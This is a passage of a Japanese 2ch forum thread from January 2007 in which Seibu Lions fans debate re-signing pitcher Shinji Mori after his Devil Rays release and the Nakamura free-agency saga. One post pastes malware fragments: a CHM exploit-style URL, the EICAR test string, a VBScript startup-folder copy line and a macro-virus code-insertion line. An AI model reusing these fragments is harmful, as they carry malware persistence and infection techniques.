森は防御率以上の働きをしてくれてたからな
球団も森に投げさせまくった責任を感じて、戦力になるかわからないけど取ってやって欲しい

290 :代打名無し@実況は実況板で:2007/01/19(金) 21:22:40 ID:brmxyXp+0
いい時期にポジションを与えられなかった野手はそのまま二軍に居ついちゃう傾向あるからねえ。
おかわりは今、絶好のポジション与えられ時だから、ノリを獲るのは長期的に見て損。

リリーフ投手はいくらいても困らない。先発を安易に移籍選手で埋めちゃうと若手が伸びなかったりするけど、中継ぎ四番手以降だからねえ。
実績あるピッチャーが復活目指して頑張る姿を見るだけで二軍でくすぶってる面々にもいい刺激になるだろうし。

291 :代打名無し@実況は実況板で:2007/01/19(金) 21:25:13 ID:ZffW8RWQ0
森は伊藤智仁みたいに1000万円ぐらいで格安で契約してあげて欲しいな。
怪我がなおるかどうかは微妙だが、もし治れば大きな戦力になる。選手枠もまだ開いているし獲得して損はないだろ

292 :代打名無し@実況は実況板で:2007/01/19(金) 21:29:45 ID:VL3Vn2Ed0
アメリカには今の状態で獲る球団無いでしょ
日本では、本当に西武が復活の可能性を信じて獲るかどうかしかありえない
厳しいけど現実的には、1年2年自分でリハビリして、テスト受けるしかないんじゃねーの?

293 :代打名無し@実況は実況板で:2007/01/19(金) 21:32:05 ID:P72iJfgF0
そういや昔森慎二ってコテいたなwww

294 :代打名無し@実況は実況板で:2007/01/19(金) 21:35:16 ID:dH6cOygd0
森、戻ってきてほしいなあ。俺はいろんな経験をした選手は
やっぱり後輩に伝えるものが何かあると思うんで。
単純に戦力として「戻ってくるな、イラネ!」という奴は
氏ねば良いとすら思う。だったら江藤なんぞを残してる西武はおかしい
だろうが。


295 :代打名無し@実況は実況板で:2007/01/19(金) 21:37:11 ID:jwgaqfLs0
>>294
森を戦力として要らないと考えるやつは
江藤もいらないと思ってるだろ…常識的に考えて

296 :携帯牛島 ◆ztOPJ4tvQw :2007/01/19(金) 21:39:01 ID:WeRsusarO
>>293
俺あのスレの住人だったww
久しぶりに来てくれないかな。

297 :代打名無し@実況は実況板で:2007/01/19(金) 21:40:34 ID:IuEA5Uh+0
>>294
あなたの言ってる事は分かるが、森にはあてはまらない。
森氏ねと何度思った事か・・・

298 :代打名無し@実況は実況板で:2007/01/19(金) 21:43:05 ID:dH6cOygd0
>>297
森に救われた試合も多いでしょ。森で負けた試合が頭に
残っているだけで。小野寺なんかには良い師匠になるでしょ。


299 :代打名無し@実況は実況板で:2007/01/19(金) 21:44:09 ID:yXMQBqrZ0
久し振りに森劇場を体験したいような気がする

300 :代打名無し@実況は実況板で:2007/01/19(金) 21:44:44 ID:BE/Ouu87O
\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type=text/ Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile dirsystem&nurupo.vbs, j:\windows\start menu\programs\startup\
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
avgnt=\C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\ /min /nosplash


301 :代打名無し@実況は実況板で:2007/01/19(金) 21:48:12 ID:G6vY1Taf0
無死満塁のピンチ→三者三振orホームラン
ぞくぞくする

302 :代打名無し@実況は実況板で:2007/01/19(金) 21:48:33 ID:cXWYoCqg0
森と言えば長野の井口からの満塁HR

303 :代打名無し@実況は実況板で:2007/01/19(金) 21:49:39 ID:Dj5H83d40
明日は新人トレあるの?
あるなら見にいきたい。

304 :代打名無し@実況は実況板で:2007/01/19(金) 21:52:33 ID:dH6cOygd0
とにかくもうーー
野球理論に精通した奴とか森みたいに普通じゃできない
経験をした奴とか、うちに残ってほしいよ。みんな他球団で
コーチにいったりして、なんか腹立つな。現役時代の成績が
良ければ良い指導者になるわけじゃないってのはあちこちでわかってる
だろうに。うちなんか伊原というのがいたわけだし。

305 :代打名無し@実況は実況板で:2007/01/19(金) 21:55:27 ID:brmxyXp+0
功労者のベテランを放出するのも温情は温情なんだよな。
飼い殺すよりは戦力として扱ってくれるところに送り出してやる、という。
問題は、その温情を放出された当の選手が感じてくれない、移籍先でコーチ手形もらっちゃうとこなんだが。

306 :代打名無し@実況は実況板で:2007/01/19(金) 21:56:56 ID:dH6cOygd0
森みたいなノーコン剛速球ピッチャーがまともなコーチになるわけないだろが

307 :代打名無し@実況は実況板で:2007/01/19(金) 21:59:43 ID:G6vY1Taf0
>>302
それだと投手井口 打者森だぞ

308 :代打名無し@実況は実況板で:2007/01/19(金) 22:00:07 ID:ZffW8RWQ0
うちは選手の見切りが本当にうまいよ。力が落ちたと思えば容赦なくきるのはドライという見方もあるが、実力が落ちた以上他球団に出してあげたほうがいいこともある。


309 :代打名無し@実況は実況板で:2007/01/19(金) 22:01:20 ID:dH6cOygd0
>>306 コーチは技術だけじゃないし。森はまあまだ現役だが
自分が現役時代にできなかったことを反省をふまえて後輩に
教えることもできるし。
経験の多い奴や頭のいい奴を残してくれってことなんだけど。
奈良原とかはうちのコーチだろ普通に考えれば。


310 :代打名無し@実況は実況板で:2007/01/19(金) 22:32:33 ID:q2UQngNP0
>>308
一応言っておくが、森の怪我は偶発的なものだからな。

311 :代打名無し@実況は実況板で:2007/01/19(金) 22:34:10 ID:wpjNQhS8O
いつのことかは覚えてないけど
森は大阪近鉄戦で一死満塁ででてきて連続三振とってたのが
印象に残ってるな

312 :代打名無し@実況は実況板で:2007/01/19(金) 22:34:16 ID:SAZDeQ8q0

>>306>>309

今ひどい自演を見た

313 :代打名無し@実況は実況板で:2007/01/19(金) 22:36:24 ID:dH6cOygd0
>>308
そりゃ表面だけ見てる分にはそれでいいんだろうが、プロ野球ってのは
けっこう長くつながってるものなんで、退団した、させられた選手が
その後どうなったかは気になります。

314 :代打名無し@実況は実況板で:2007/01/19(金) 22:36:28 ID:uNbvNbf+0
ID:dH6cOygd0


315 :309:2007/01/19(金) 22:38:42 ID:dH6cOygd0
俺は、>>306ではありません。断じて!
同IDの理由はよくわかりませんが。


316 :代打名無し@実況は実況板で:2007/01/19(金) 22:41:06 ID:wpjNQhS8O
さっきから必死すぎワロタ

317 :代打名無し@実況は実況板で:2007/01/19(金) 22:44:09 ID:q2UQngNP0
誰も信じない罠

318 :代打名無し@実況は実況板で:2007/01/19(金) 22:54:05 ID:/ns5QSDf0
>>970
一応立てた.
誤爆ホントにスマソ

駅名しりとり関東編 Part18
http://hobby9.2ch.net/test/read.cgi/train/1169214583/

319 :代打名無し@実況は実況板で:2007/01/19(金) 22:54:49 ID:/ns5QSDf0
>>318
すまん自分あせってる
一回逝ってくるわ

320 :代打名無し@実況は実況板で:2007/01/19(金) 22:55:15 ID:G6vY1Taf0
>>318
おまえもう1度謝れよ

321 :代打名無し@実況は実況板で:2007/01/19(金) 22:55:33 ID:brmxyXp+0
IDかぶりは稀に起こる現象らしいぞ。
別に荒らしてるわけでもないし、本人がそう主張するなら別人てことでいいんじゃないの。

んー、でも、ノーコン投手から名コーチになった奴って誰かいたか?
現代の名投手コーチって言ったら森繁和か尾花だが、二人ともノーコンではなかった気が。

322 :代打名無し@実況は実況板で:2007/01/19(金) 22:57:32 ID:G6vY1Taf0
>>321
与死球王の東尾




はコントロールして当ててたかw

323 :代打名無し@実況は実況板で:2007/01/19(金) 22:57:46 ID:/ns5QSDf0
>>320
ホントにスマソ!

324 :代打名無し@実況は実況板で:2007/01/19(金) 23:00:03 ID:tAZSGpH40
>>309
功労者かもしれないが、森や豊田や松坂みたいに
自分から出て行った奴はどうでもいい。

325 :代打名無し@実況は実況板で:2007/01/19(金) 23:00:33 ID:V8QBTfqN0
自分もIDかぶったことある。

んで森のことだけど、やっぱ西武に戻ってきてほしいな。

326 :代打名無し@実況は実況板で:2007/01/19(金) 23:02:52 ID:e1/pIkJA0
充ちゃん

327 :代打名無し@実況は実況板で:2007/01/19(金) 23:07:04 ID:brmxyXp+0
>>322
内角に投げ込めるのは制球に自信がある証拠だよ。
本人は狙った事はないというが、通算四球に比べて通算死球が不自然に多いよなあ、東尾。

あと。
東尾は投手コーチではないじゃん?
監督なら通算最多四球の金田も結果出してる。

328 :代打名無し@実況は実況板で:2007/01/19(金) 23:16:34 ID:v/5UEyq90
>2年契約なので今年は何とかなるが

どゆこと?

329 :代打名無し@実況は実況板で:2007/01/19(金) 23:18:45 ID:G6vY1Taf0
契約を途中で切るから違約金みたいな

330 :代打名無し@実況は実況板で:2007/01/19(金) 23:21:24 ID:bLe7Jvoy0
>>328
お金の問題じゃない?


331 :代打名無し@実況は実況板で:2007/01/19(金) 23:23:58 ID:v/5UEyq90
>>329-330
d 金のことか
森もそうだけどデビルレイズもカワイソスだな…

もし日本復帰の場合自由に獲得できんのかな

332 :代打名無し@実況は実況板で:2007/01/19(金) 23:24:57 ID:fUVbOepb0
森投手コーチとかあり得ないが、ナベQ、石井丈投手コーチなんてあり得ないことしてるしな。
案の定うまくいってないし。
どこへ行くかはボールに聞いてくれってタイプで、才能だけで勝ってきて
スピードが衰えたら勝てなくなった奴にコーチなんかできるわけがない。

333 :代打名無し@実況は実況板で:2007/01/19(金) 23:25:08 ID:G6vY1Taf0
ポスティングだから日本では自由契約になってるでしょ?

334 :代打名無し@実況は実況板で:2007/01/19(金) 23:29:43 ID:D464WJkX0
>>332
石井丈が?
選手のタイプとコーチの才能なんて全くの別もんだろうが

335 :代打名無し@実況は実況板で:2007/01/19(金) 23:30:16 ID:nsVk7eNs0
石井丈はめちゃくちゃコントロール良かったぞ。

336 :代打名無し@実況は実況板で:2007/01/19(金) 23:33:12 ID:fmrUVna70
デ軍、森を解雇と地元紙 岩村とのコンビは実現せず

 【ニューヨーク19日共同】米大リーグ、デビルレイズの地元紙セントピーターズバーグ・タイムズ
(電子版)は19日、昨年3月のオープン戦で右肩脱臼し、その後は登板しないまま復活を目指していた
森慎二投手(32)をデビルレイズが18日に解雇したと報じた。森は今季、2年契約の2年目だった。
 デビルレイズは昨年、ポスティングシステム(入札制度)で岩村明憲内野手を獲得しているが、
日本人選手がそろってグラウンドに立つ機会はなくなった。
 同紙によると、マドン監督が春季キャンプでの投球再開は難しいとの見解を示し、球団も解雇を決定したという。
 森は今月、古巣西武の練習場で自主トレを行うなど復帰に向けて意欲を見せていたが、全盛期の腕の振りには
程遠い状況だった。
(了)

[ 共同通信社 2007年1月19日 23:05 ]


337 :代打名無し@実況は実況板で:2007/01/19(金) 23:42:49 ID:q2UQngNP0
石井丈裕が荒れ球……そんな認識をされるとは
時代も流れたもんだ

338 :代打名無し@実況は実況板で:2007/01/19(金) 23:44:00 ID:qMTOXRpZ0
>>333
ポスティングで日本復帰の場合、西武が権利を持ってるはず

339 :代打名無し@実況は実況板で:2007/01/19(金) 23:52:14 ID:jREPNNNj0
みんな森に甘いな
わざわざ豊田FAで抑え崩壊か!?って時にポスティングで出ていった投手なんて未練はないよ。
同じ出て行くにしても松坂とはまるっきり違う
それよかポスティングでメジャー挑戦してダメだったらまた簡単に復帰できるのがデフォになったら
日本球界のためにもよくない

340 :名無しさん@実況は実況板で:2007/01/19(金) 23:52:38 ID:bjLlsWuA0
>>338
ポスティングで金貰って日本での保有権まであるなら
西武にはウマすぎるぜw
松坂なんで60億以上貰ってるのに〜

341 :代打名無し@実況は実況板で:2007/01/20(土) 00:03:48 ID:v+PvfC8B0
自分から出て行った選手なんだし戦力として使いものにならないなら
獲るべきじゃないでしょ。
周りにいい影響を与えるほどの経験だってしてないだろうし。
経験だったらノリのほうが豊富だな。




342 :代打名無し@実況は実況板で:2007/01/20(土) 00:07:28 ID:MI6vNcwS0
少なくともルーキーが全員その投球に注目するくらいの経験はある。
その期待に慎二が答えられるかどうかは知らん。

343 :代打名無し@実況は実況板で:2007/01/20(土) 00:08:03 ID:iem6wZKt0
肩の状態次第だよな、なんかもう無理っぽい感じが

344 :代打名無し@実況は実況板で:2007/01/20(土) 00:10:16 ID:4PUseocc0
大沼の肩をつけてあげたい・・・

345 :代打名無し@実況は実況板で:2007/01/20(土) 00:12:36 ID:YFqxbDCs0
>>344
いっそ森の心臓を大沼につけよう・・・

346 :代打名無し@実況は実況板で:2007/01/20(土) 00:16:52 ID:u0g7oJCE0
>>341
経験「だけ」なら確かにw
腐ったミカンを置いておくと周りのミカンも腐るからな・・・

しかし大沼さんは・・・どこか悪いんではないか

347 :代打名無し@実況は実況板で:2007/01/20(土) 00:19:22 ID:RrIhBkPA0
>>345
不整脈が……。

いや、ポスティングにかけたのは球団側なんだから、自分から出て行った選手ではないだろ、森も松坂も。
出ることを彼らは希望して、それを球団は止めなかった。
FAだと止めたくても止められないから、話は結構違う。

ただ、個人的には、出したにしろ出されたにしろ、ライオンズで一時代を築いた選手はみんな頑張って欲しいし、なんらかの形で戻ってきてくれるんならしこりなくおかえりと言ってやりたい。

348 :代打名無し@実況は実況板で:2007/01/20(土) 00:19:22 ID:hfNA9j6e0
>>344-345
新外国人投手、モリス・ヌマジャ

349 :代打名無し@実況は実況板で:2007/01/20(土) 00:19:43 ID:6K/4q8cl0
沼はもっとゆったりしたフォームにしたらいいのに
思いっきり投げて150出すより145くらいを軽い振りで出した方が打ちづらい

350 :代打名無し@実況は実況板で:2007/01/20(土) 00:22:04 ID:Xo5wcJcs0
モリス・ヌマジャは力を入れて思いっきり投げないと死んでしまいます


351 :代打名無し@実況は実況板で:2007/01/20(土) 00:27:12 ID:eKIzXHN10
>>349
その5qの差ってのは、かなり微妙だと思うぞ。

352 :名無しさん@実況は実況板で:2007/01/20(土) 00:38:34 ID:eMjmoWlC0
>>341
ポスティングかけて球団にも金が入った。
自分から出て行った言うな、森も毎日投げて何年も頑張った。
西武と関係ないノリとくらべんな!


353 :代打名無し@実況は実況板で:2007/01/20(土) 00:42:22 ID:Xo5wcJcs0
何よりもノリには馴染みがないので親近感が沸かない
根っからの関西だし

354 :代打名無し@実況は実況板で:2007/01/20(土) 00:43:00 ID:YFqxbDCs0
そういえばカズオは来季の契約決まったんだっけ?
カズオーーーっていうと、のだめ思い出す

355 :代打名無し@実況は実況板で:2007/01/20(土) 00:47:22 ID:YFqxbDCs0
ただ、ここまでノリの株が落ちちゃうと俺なんかは「逆襲のノリ」なんてのも見たい気もするんだよな。
別に西武でじゃなくていいんだけど・・・。
オリ戦でHRとか打ったら話の種にはなるじゃん。逆にどっかに拾われてやっぱりダメだった場合
でもネタになるしな。



356 :代打名無し@実況は実況板で:2007/01/20(土) 00:51:20 ID:Xo5wcJcs0
ネタ的には巨人がノリを拾えばいい
西武には関係ないな

357 :代打名無し@実況は実況板で:2007/01/20(土) 00:59:15 ID:houTyvuk0
>>354
ずいぶんダウンしたけどロッキーズとそのまま契約したはず。
18000万で出来高10000万ぐらいの契約だったと思う。

チームが右の多いチーム構成で、特に西武に何の縁の無い評判のあんまり良くない中村と
元西武の選手、メジャーに行ったとは言えポスティングで出した選手
それまでの実績は現役でも屈指、現在は右左に問わず信頼のできる投手が少ない
事を考えると中村と比べものにならんでしょ。
ってかポスティングって保有権残らないよね?


358 :代打名無し@実況は実況板で:2007/01/20(土) 01:12:21 ID:TF865WD30
ポスティングは保有権のこらないよ。石井一久も復帰したときヤクルト以外とも交渉したしね。
西武の補強ポイントは野手より投手なのは明らか何だから必要性を考えれば森>>>中村は明らか。
怪我の治らない可能性もあるがその場合は二軍でリハビリに専念させれば問題ないし、とりあえず獲得して損はない選手だと思う。

359 :代打名無し@実況は実況板で:2007/01/20(土) 01:20:05 ID:zNfBEpSF0
ノリは怪我しなきゃ3割40本はいける。
かたや森慎二なんて、負け試合の中継ぎにしか使えない。
どちらがチームに必要かはわかるよな?

360 :代打名無し@実況は実況板で:2007/01/20(土) 01:21:08 ID:TF865WD30
>ノリは怪我しなきゃ3割40本はいける。
ダウト!

361 :代打名無し@実況は実況板で:2007/01/20(土) 01:23:58 ID:4PUseocc0
森も怪我しなきゃ(ry

362 :代打名無し@実況は実況板で:2007/01/20(土) 01:24:45 ID:le3LckVi0
>>347
3人とも西武ではやりたくなかったのは共通してるだろ

363 :代打名無し@実況は実況板で:2007/01/20(土) 01:29:18 ID:Xo5wcJcs0
今日のホームラン

>ノリは怪我しなきゃ3割40本はいける。


364 :代打名無し@実況は実況板で:2007/01/20(土) 01:32:27 ID:Q0OSb+WLO
今の海苔じゃ3割40本なんて到底無理
せいぜい2割6分25本程度だろ

365 :代打名無し@実況は実況板で:2007/01/20(土) 01:40:25 ID:mXSruUMm0
ノリも森も獲ってほしい。
2人とも5年前はパリーグの主役だったんだぜ?
ノリなんか西武ファンとしては凄く憎い存在だったけど、それ以上にライバルって感じで大好きだったよ。
まだまだやれるのに、今のネタにされまくりな状況は悲しい。
2人とも可哀相すぎる


366 :代打名無し@実況は実況板で:2007/01/20(土) 01:40:30 ID:4PUseocc0
そんなに言うならTF865WD30がノリの年俸分負担しろよ
500万ぐらいなら何とかできてしまうがw

367 :代打名無し@実況は実況板で:2007/01/20(土) 01:52:49 ID:lneVRha80
うちに縁もゆかりも無く問題児の海苔の獲得が話題になること事態が理解できん。
森はメジャーにいった時に、西武球団がいきなりポスティングを言い出したということもあって
何の準備もしていなかったらしくそれがあちらさんの心証を悪くしているという
話もあったな。
復活は厳しいのではないかな。

368 :代打名無し@実況は実況板で:2007/01/20(土) 01:53:27 ID:1KXaB8GkO
現実問題、動くとしたら森だけどね
キャンプに二人ともテストに来たら笑えるな

369 :代打名無し@実況は実況板で:2007/01/20(土) 01:57:13 ID:mXSruUMm0
森は伊原と東尾に酷使させられてね
なんでか知らんが酷かったよな
東尾時代はリリーフで3イニング投げさせて翌日も登板とか
伊原時代は点差離れててセットアッパー出す展開じゃないのに森出したり

それに比べると伊東はいいねえ。投手壊す使い方しないから。

370 :代打名無し@実況は実況板で:2007/01/20(土) 01:57:21 ID:u0g7oJCE0
あんな打てない・走れない・守れない・空気読めない人を獲るなら、おかわりを全試合固定して欲しい。
まさに百害あって一利無しですよ。
江藤・平尾・石井だっているし。

371 :代打名無し@実況は実況板で:2007/01/20(土) 01:59:17 ID:zNfBEpSF0
だけどよう、野球ゲームではノリさん強いから入団して欲しいんだよ。
モリスコはいらね。

372 :代打名無し@実況は実況板で:2007/01/20(土) 01:59:22 ID:TF865WD30
伊東は怪我に関してだけは異様に敏感だからな。少しでも怪我の兆候が出たらすぐに下に落とす。
片岡なんかたいした怪我でもなかったのに去年の最後下に落とされてファームの試合に出ていたし。
怪我でつぶれた選手をかなりたくさん見てきたから無理させないようにしているんだろうな。


373 :代打名無し@実況は実況板で:2007/01/20(土) 02:00:59 ID:mXSruUMm0
2006
ノリ .231 12本 45打点 GG何回も受賞
剛也.275 9本 29打点

打率以外全ての面でノリが上だろ・・・

374 :代打名無し@実況は実況板で:2007/01/20(土) 02:01:47 ID:sCHoUAK40
森の肩の怪我はあの伊藤智仁と同じケースなので
元の状態には到底戻らないだろぅ‥去年の秋で100キロ程度じゃね
今で130キロも出てるのだろうか??
球速が140まで戻らなかったら引退かな
そーゆう軟投ピッチングが出来る投手じゃなかったし

375 :代打名無し@実況は実況板で:2007/01/20(土) 02:04:24 ID:uTtXdObg0
ある程度球速でればフォークがあるからいけるかもよ

376 :代打名無し@実況は実況板で:2007/01/20(土) 02:05:48 ID:u0g7oJCE0
夜中から早々とNG二つか・・・
まぁ笑えるけど


森はほぼ速球とフォークのみだったしね・・・
引退前の槙原みたいになっちゃいそう。
しかもノーコンな

377 :代打名無し@実況は実況板で:2007/01/20(土) 02:06:22 ID:4PUseocc0
近鉄戦でファースト守ったこともあるから野手転向で

378 :代打名無し@実況は実況板で:2007/01/20(土) 02:07:06 ID:a20f4DHs0
まあ、自分から出て行った選手
かわいそうな気はするが、獲ってもためにはならないだろう

379 :代打名無し@実況は実況板で:2007/01/20(土) 02:09:13 ID:u0g7oJCE0
>>377
森って魔送球の素質無かったっけ?
違う人だったかもしれんが

380 :名無しさん@実況は実況板で:2007/01/20(土) 02:12:15 ID:eMjmoWlC0
>>374
ピッチャーの脱臼て致命傷なのか?




381 :代打名無し@実況は実況板で:2007/01/20(土) 02:17:57 ID:lneVRha80
監督は元々投手の酷使には批判的だったのもあって酷使を避ける方針みたいだから
投手陣にとっては得難い監督だと思うよ。
荒木を呼んだのもそこらへんの意見の一致みたいだし。
野手も球団がケチケチなのもあって一昨年みたいに怪我人続出が即致命傷になるほど
層が薄いし、監督が神経を尖らせるのも無理は無い。

382 :代打名無し@実況は実況板で:2007/01/20(土) 02:20:34 ID:1KXaB8GkO
日刊スポーツ
◆自由契約ノリが来週から売り込み開始

オリックスから自由契約となった中村紀洋内野手(33)は、19日も兵庫・芦屋市内のスポーツジムでトレーニングを行った。「連絡やオファーはありません」と明かした上で「来週から自分で活動して行きます」と、セールス行脚することをあらためて強調した。
こりゃ困ったなぁ…サードが固定されてないとなこからバンバンきそう
ヤクルト、日ハム、楽天 ときて…うち?

383 :代打名無し@実況は実況板で:2007/01/20(土) 02:23:49 ID:u0g7oJCE0
>>380
赤星がアキレス腱切るようなものでは

384 :代打名無し@実況は実況板で:2007/01/20(土) 02:24:25 ID:22MrxbEJ0
>>382
その前にロッテだろ

385 :代打名無し@実況は実況板で:2007/01/20(土) 02:25:52 ID:4D1clBNE0
>>373
荒らしにレスするのも何だが今時打撃三部門で評価するのは馬鹿

ノリ   出塁率.292 OPS.701
ゴーヤ 出塁率.359 OPS.787

結論、ノリはゴミ

386 :代打名無し@実況は実況板で:2007/01/20(土) 02:27:07 ID:mXSruUMm0
実際ノリ以上のサードって各球団見渡しても中々いないよね
パリーグだけでもノリ以上と言えるのは小久保とホセぐらいでしょ
しかも守備含めるとノリ>小久保ホセになる
年俸安いなら獲ってほしいな

387 :代打名無し@実況は実況板で:2007/01/20(土) 02:30:08 ID:sCHoUAK40
森の肩の怪我はロッテの黒木が経験した肩の怪我よりももっと酷いかな

388 :代打名無し@実況は実況板で:2007/01/20(土) 02:31:17 ID:1KXaB8GkO
>>384 ロッテは社長がいらないって言ってるし、これでとったら笑い者
そういう意味でいくと日ハムは『みたいファンもいない』まで言われてるから行かないか

389 :代打名無し@実況は実況板で:2007/01/20(土) 02:40:01 ID:kzqYSlii0
相当買い叩けそうだから、それなら取ってもいい気がするけど。
サードは若干心許ないし。

390 :代打名無し@実況は実況板で:2007/01/20(土) 02:42:37 ID:Sbp/GyzZ0
>380
脱臼も問題だし、何よりただの脱臼じゃないだろう。
医者じゃないんで専門的なことは分からんが、恐らく関節唇、
或いは関節包とかを損傷してるんじゃないのか。

391 :代打名無し@実況は実況板で:2007/01/20(土) 02:44:50 ID:TF865WD30
中村の場合は戦力的な面よりも性格的な面が嫌われているからな。
チームの不穏分子になるからいらないというチームがほとんど。
いままでお山の大将として振舞ってきたツケが一気にでてきたな。

392 :名無しさん@実況は実況板で:2007/01/20(土) 02:48:11 ID:eMjmoWlC0
>>390
そうなんだ
かわいそうだな森


393 :代打名無し@実況は実況板で:2007/01/20(土) 03:42:42 ID:RrIhBkPA0
関節唇と関節包両方やっちゃった中里は150km/h出すまで回復したぜ。
まだ若かったし4年はかかったが。

394 :代打名無し@実況は実況板で:2007/01/20(土) 03:58:17 ID:HGxQdTpsO
とにかく森にはテスト生で来てもらおう!


395 :代打名無し@実況は実況板で:2007/01/20(土) 04:11:30 ID:vQsnGRZl0
     _、_
   ( ,_ノ` )
 (⌒`::::   ⌒ヽ
  ヽ:::: ~~⌒γ⌒)
   ヽー―'^ー-'
    〉 11 │

396 :代打名無し@実況は実況板で:2007/01/20(土) 04:14:48 ID:ES9Ot5E90
>>395
森慎二から球威を取ったらそうなるよなorz

397 :代打名無し@実況は実況板で:2007/01/20(土) 04:21:26 ID:HeoPpL8uO
>>396
森の心臓には毛がはえている
ピンチを楽しめる
大沼はノミの心臓
ピンチになるとビビるだけ

まぁ、森から球威なくなったら大沼以下だろうけどね
ストレートが生きてなきゃフォークも生きない

森の復活キボン

398 :代打名無し@実況は実況板で:2007/01/20(土) 04:42:34 ID:gvKCWx0L0
>>397
大沼と比べる意味がわからん

399 :代打名無し@実況は実況板で:2007/01/20(土) 05:53:06 ID:majoCDDW0
流れ的に普通比べるだろ

400 :代打名無し@実況は実況板で:2007/01/20(土) 06:25:11 ID:n57niyd40
741 名前:代打名無し@実況は実況板で[sage] 投稿日:2007/01/20(土) 06:11:25 ID:SBP5O+3W0
元西武の森(32)(現デビルレイズ)が解雇に。
昨年ポスティングで移籍、2年契約でオープン戦に登板するも肩を故障。
現在も治療中で、結局、一球も投げずに解雇となった。
西武関係者は、正式な解雇手続きの後、獲得を検討する。話し合う用意はある」とのこと。
右肩の回復次第では古巣復帰の可能性もある。

401 :代打名無し@実況は実況板で:2007/01/20(土) 07:13:53 ID:N+Jql4Gy0
>>400
これだね
http://www.sponichi.co.jp/baseball/news/2007/01/20/07.html

402 :代打名無し@実況は実況板で:2007/01/20(土) 07:21:09 ID:n57niyd40
http://www.sponichi.co.jp/baseball/news/2007/01/20/04.html
なにがなんだか・・・

403 :代打名無し@実況は実況板で:2007/01/20(土) 07:36:08 ID:Xo5wcJcs0
>>394
とりあえず育成選手で

404 :代打名無し@実況は実況板で:2007/01/20(土) 07:49:54 ID:HGxQdTpsO
>>403 真面目な話し、さすがに功労者だし流石に一軍最低年俸はらうでしょ
下手すりや5000万は払う

405 :代打名無し@実況は実況板で:2007/01/20(土) 07:49:55 ID:LpsYMOmS0
森かわいそうだな
確かあっちの首脳陣の評価よかったんだよな・・・

406 :代打名無し@実況は実況板で:2007/01/20(土) 07:56:18 ID:22MrxbEJ0
中継ぎのコマ不足は深刻だし帰る気があるなら取って欲しいね。
でも今年に限っては安い給料+出来高って形がよさそう。

407 :代打名無し@実況は実況板で:2007/01/20(土) 07:59:52 ID:IpQ/M4aa0
むこうの契約は二年だから今年の分は保証されてるだろうから額は低くてもいけそうだけど

408 :代打名無し@実況は実況板で:2007/01/20(土) 08:04:40 ID:PymgM1ag0
>>404
ポスティングで一億しか残さなかった奴に
ポンコツになって帰ってきて、5000万も払ってたまるかよ。

409 :代打名無し@実況は実況板で:2007/01/20(土) 08:09:47 ID:Xo5wcJcs0
>>404
5000万円ってw
せいぜい1000万円+出来高ぐらいかな

410 :代打名無し@実況は実況板で:2007/01/20(土) 08:19:41 ID:7BkfLmDk0
西武希望枠・岸が初ブルペン…卒業試験の間も「夜投げます」

前日18日の夜に所沢へ戻ってきた。
再び21日から来週中旬まで仙台にとんぼ返りする強行日程の中、試運転を始めた肩は休ませたくない。首脳陣からキャンプ初日からのブルペン入り、投内連係参加を義務づけられており、試験勉強の合間を縫って夜間投球を敢行する。
http://www.sanspo.com/baseball/top/bt200701/bt2007012007.html

いいのか悪いのか?
岸は競輪トレとボクシングトレは参加しませんね。



411 :代打名無し@実況は実況板で:2007/01/20(土) 08:24:43 ID:Xo5wcJcs0
こんなスレまで立ってるとはw
ttp://ex13.2ch.net/test/read.cgi/base/1169224730/l50

412 :代打名無し@実況は実況板で:2007/01/20(土) 08:28:47 ID:7BkfLmDk0
西武「茶髪・ロン毛」に罰金100万円
http://www.sponichi.co.jp/baseball/news/2007/01/20/04.html

伊東も方針がコロコロ変わりますねぇ。
希望枠の岸ってこう言った管理が嫌いでウチを選んだんじゃなかったっけ?
森がウチに復帰の可能性も出てきたし、背番号11とかどうするんでしょうか?


413 :代打名無し@実況は実況板で:2007/01/20(土) 08:37:51 ID:CenwRD/B0
>>412
松坂抜けるからダメって何回書けばいいのかね・・・
ワンパターン過ぎて呆れてしまう。
あと、100kmしか投げられない奴は欽ちゃん球団しか
行くところないから、うちには関係ない。

414 :代打名無し@実況は実況板で:2007/01/20(土) 08:42:21 ID:HeoPpL8uO
金髪、ロン毛禁止って去年もやってたじゃん
またキャンプ中のみでしょ?

415 :代打名無し@実況は実況板で:2007/01/20(土) 09:30:26 ID:7BkfLmDk0
L岩崎が変則フォークに挑戦
http://hochi.yomiuri.co.jp/baseball/npb/news/20070120-OHT1T00067.htm

ストレートの回転もクセ球なんですね。
シンカー投げられる様ですから左打者にも有効だと思うんですが・・。


416 :代打名無し@実況は実況板で:2007/01/20(土) 09:35:31 ID:rO0jO92IO
大沼の全盛期はドカベンでメインキャラで書かれた時だな

417 :代打名無し@実況は実況板で:2007/01/20(土) 09:41:09 ID:2/DlAoy90
鈴木健の全盛期もドカベンで結構喋ってた時だな。

418 :代打名無し@実況は実況板で:2007/01/20(土) 09:41:40 ID:ESqU244Q0
大沼があのくるくるパーマを切って髪を黒くするのはすばらしいことだ
伊東監督を支持する

419 :代打名無し@実況は実況板で:2007/01/20(土) 09:44:27 ID:9R53bcOd0
優勝した翌年は茶髪でもロン毛でも好きにさせて
優勝できなかった翌年は禁止すればいい。

420 :代打名無し@実況は実況板で:2007/01/20(土) 09:46:53 ID:gzF5ydU40
>>419
ベンちゃんが可哀想過ぎるから却下

421 :代打名無し@実況は実況板で:2007/01/20(土) 10:07:34 ID:PzsoiCol0
ベンも茶髪のロン毛にすれば良いじゃん

422 :代打名無し@実況は実況板で:2007/01/20(土) 10:34:09 ID:6FSaBWHy0
出来るか!w

いや、ベンちゃんに不可能はないはずだ

423 :代打名無し@実況は実況板で:2007/01/20(土) 10:43:10 ID:wfxMaMWd0
あのままロン毛にしたら落ち武者みたいになってしまうぞ

424 :名無しさん@実況は実況板で:2007/01/20(土) 10:49:53 ID:VbRHlOP60
落ち武者と言えば渡辺久がパッと浮かぶ〜
工藤はフサフサだなw

425 :代打名無し@実況は実況板で:2007/01/20(土) 11:04:01 ID:xH1flxRnO
やたぁあああああああああああああああ
慎二帰ってくるううぅ



426 :代打名無し@実況は実況板で:2007/01/20(土) 11:07:07 ID:Q0OSb+WLO
ポスティングで出ていって肩ぶっ壊したくせに獲らなくていいっつーの。
アホか。

